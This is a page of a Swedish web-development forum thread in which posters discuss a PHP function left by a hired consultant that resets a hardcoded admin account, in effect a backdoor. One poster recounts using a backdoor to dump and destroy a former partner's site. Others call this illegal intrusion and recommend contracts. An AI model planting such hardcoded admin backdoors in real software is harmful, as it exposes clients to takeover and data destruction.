WN
Sidan 2 av 5 1 2 34 Sista »
Visa 40 inlägg från det här ämnet på en sida

WN (https://www.wn.se/forum/index.php)
-   E-kommers (https://www.wn.se/forum/forumdisplay.php?f=10)
-   -   Hur skulle ni reagera om en konsult gjorde en sån här kod? (https://www.wn.se/forum/showthread.php?t=1057675)

BarateaU 2013-04-22 17:07
Fråga snarare vad avsikten var. Om det är att generiskt testa någon funktion och sedan återsälla konto/lösen eller vad anledningn till denna kod är. Antar att den inte skall vara med i slutprodukten.
Förstår att du ryggar undan när du ser det, benämningen på frågan är oroande också. Ifall det handlar om att lämna bakdörrar för att utnyttja senare.

daniel_ 2013-04-22 18:15
Inte helt ovanligt att utvecklare lämnar bakdörrar för att skydda sig från om uppdragsgivaren inte skulle betala. Jag anser inte att det är rätt men jag vet att det förekommer, har dock inte varit med om det själv. Vill minnas att det var någon på WN för några år sedan som gjorde något liknande, just för att försäkra sig om betalning efter avslutat projekt.

yakuzaemme 2013-04-22 18:18
Citat:
Ursprungligen postat av daniel_ (Inlägg 20468285)
Inte helt ovanligt att utvecklare lämnar bakdörrar för att skydda sig från om uppdragsgivaren inte skulle betala. Jag anser inte att det är rätt men jag vet att det förekommer, har dock inte varit med om det själv. Vill minnas att det var någon på WN för några år sedan som gjorde något liknande, just för att försäkra sig om betalning efter avslutat projekt.
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.

Linuus 2013-04-22 18:22
Citat:
Ursprungligen postat av yakuzaemme (Inlägg 20468286)
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Kanske lämpligare att skriva ett avtal istället :)

xciso 2013-04-22 18:23
Är nog både rätt och fel.
Tycker nog det borde vara bättre att skriva ett bra avtal mellan parter.

daniel_ 2013-04-22 18:26
Citat:
Ursprungligen postat av yakuzaemme (Inlägg 20468286)
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Se där ja!

Därför är det viktigt med både avtal och allmänt förtroende mellan parterna. Jag tror tyvärr du hade kunnat åka på dataintrång eller liknande även om det var fel det dina vänner gjorde.

yakuzaemme 2013-04-22 18:45
Citat:
Ursprungligen postat av Linuus (Inlägg 20468288)
Kanske lämpligare att skriva ett avtal istället :)
Givetvis, men ung och dum, trodde dessutom inte det skulle bli så stort som det faktiskt blev.

MRDJ 2013-04-22 21:09
Citat:
Ursprungligen postat av xciso (Inlägg 20468261)
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:
        public function hack() {
                $this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
                $this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
        }
Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..
härrejäklar, fulare får man leta efter. :)

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

Conny Westh 2013-04-22 22:32
Citat:
Ursprungligen postat av xciso (Inlägg 20468278)
Då är vi 2 :D
Dock lite tråkigt när jag tycker han verkat reko, och är billig.
Han är från Tjeckien, vilket kanske inte gör saken bättre.. Dock är priset på $20/h bra :)
Här passar ett gammalt känt ordstäv in:

Citat:
Man får vad man betalar för.

Conny Westh 2013-04-22 22:38
Citat:
Ursprungligen postat av yakuzaemme (Inlägg 20468286)
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Det du gör är olagligt dataintrång. Det din motpart gör är bara en vanlig tvist om betalning. Det är bättre att hålla på koden tills dn motpart har betalt än att själv begå olagligheter. Skriv ett ordentligt avtal som ger dig rätten till ett fett vite om motparten använder koden utan att betala fullt ut i stället.

Du riskerar fängelse medan motparten bara riskerar lite pengar och en vänskap som den andre tydligen inte värderade särskilt högt.

Själv skulle jag aldrig gå in och förstöra filer för en kund oavsett hur stor tvist det gäller. Möjligen kan jag tänka mig att ha en tidsbestämd körtid innan applikationen slutar att fungera. Men det är en normal funktion som man har i vissa applikationer. Det funkar om man inte ger kunden tillgång till källkoden förrän de betalt för den.


Alla tider är GMT +2. Klockan är nu 03:15.
Sidan 2 av 5 1 2 34 Sista »
Visa 40 inlägg från det här ämnet på en sida

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson